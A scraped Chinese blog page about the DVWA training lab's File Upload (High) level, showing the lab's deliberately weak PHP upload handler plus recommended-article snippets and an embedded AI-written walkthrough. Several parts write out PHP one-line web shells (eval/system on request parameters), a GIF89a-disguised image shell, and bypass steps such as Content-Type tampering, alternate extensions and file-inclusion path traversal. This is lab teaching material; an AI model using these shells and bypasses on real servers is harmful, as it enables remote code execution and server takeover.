DVWA-File Upload(High)

最新推荐文章于 2025-07-14 01:41:17 发布
最新推荐文章于 2025-07-14 01:41:17 发布
阅读量1.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wst0717/article/details/102697324
本文深入分析了PHP中FileUpload(High)级别的代码实现,详细解释了如何判断上传文件是否为图片,检查文件大小和类型,并尝试将文件移动到指定目录的过程。同时,探讨了代码中存在的潜在安全风险。

文章目录

File Upload(High)

代码分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
		( $uploaded_size < 100000 ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

?>
4.File UploadHigh)——小白笔记——DVWA
qwsn
11-16 1788
0x01:High级别的DVWA测试 1.上源码 File Upload Source: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA文件上传
qq_62078839的博客
04-03 3822
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA File Upload 漏洞实战指南】(Low / Medium / High 全级别解析)
weixin_40433003的博客
04-18 1250
文件上传功能是 Web 应用中非常常见的一种功能,用于上传头像、文档、图片等文件。但如果验证不当,攻击者可能上传恶意脚本,进而控制服务器。在 DVWA 中,模块专门设计用于演练此类漏洞的不同防御等级。打开FileUpload的时候看到有红色的报错信息如图所示:报错一:Incorrect folder permissions: /var/www/html/dvwa/hackable/uploads/Folder is not writable.文件夹权限不正确:文件夹不可写。
DVWA系列】——File Upload——High详细教程(webshell工具哥斯拉)
最新发布
2402_84408069的博客
07-14 1135
摘要:本文详细解析DVWA File UploadHigh级别)的防御机制,包括后缀白名单、MIME校验及文件头检测,并提出通过图片马绕过防护的方法。教程涵盖三种图片马制作技术(二进制合并、010 Editor修改及哥斯拉生成),配合Burp篡改Content-Type实现上传。利用文件包含漏洞触发执行,并配置哥斯拉连接WebShell。强调需在授权环境下测试,遵守法律法规,禁止非法用途。文中包含完整操作流程、错误排查及自动化利用技巧,附流程图辅助理解。
DVWA之文件上传(File Upload
qq_39682037的博客
03-21 2735
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWAFile Upload(文件上传)
RexHa的博客
10-02 2990
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA靶场-----FIle Upload(文件上传)
m0_65712192的博客
11-14 5735
DVWA靶场-----FIle Upload(文件上传)
DVWA -File Upload-通关教程-完结
刘箫-技术库
04-07 2533
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWA--File Upload(文件上传)(全难度)
wwxxee
02-20 2340
DVWAFIle Upload(文件上传) 逻辑 选择文件上传: 难度分级 Low 核心代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][
DVWA--file upload (文件上传)
weixin_50342860的博客
08-23 1634
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA-File Upload
R4bbit
06-28 1774
0x00 low 后端对上传文件未做任何设置,直接上传即可,现在基本上已经见不到这种漏洞了 上传一句话木马 直接上蚁剑 0x01 Medium 直接上传发现,服务器后端做了一些限制,具体是限制什么并不清楚(虽然我偷懒已经直接看writeup了...) 在burpsuite中修改后缀为jpg,发现不行,仍然提示 image was not uploaded,那就可能不是通过后缀名来限制上传,不然后缀是jpg为什么不让我上传,当然也有可能是做了双重判断(Content-Type...
DVWA-File Upload文件上传
mlws1900的博客
03-16 1146
黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA靶场通关笔记-文件上传(High级别)
mooyuan的网络安全博客
07-03 981
本系列为通过《DVWA靶场通关笔记》的文件上传关卡(low,medium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为文件上传high级别关卡的渗透部分。
DVWA-File Upload(文件上传)
简简的博客
02-02 581
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA--文件上传(初中高)
firecjh的博客
06-10 2877
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
利用DVWA演示文件上传漏洞获取网站shell权限(High级别)
weixin_43822401的博客
06-13 955
文件上传漏洞是网络安全中常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的High级别设置,绕过文件类型和内容限制,获得网站的shell权限。
DVWA-文件上传
Xiayuyuren_Study的博客
06-05 6246
概述 文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己...
DVWA -File Upload fi
03-24
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值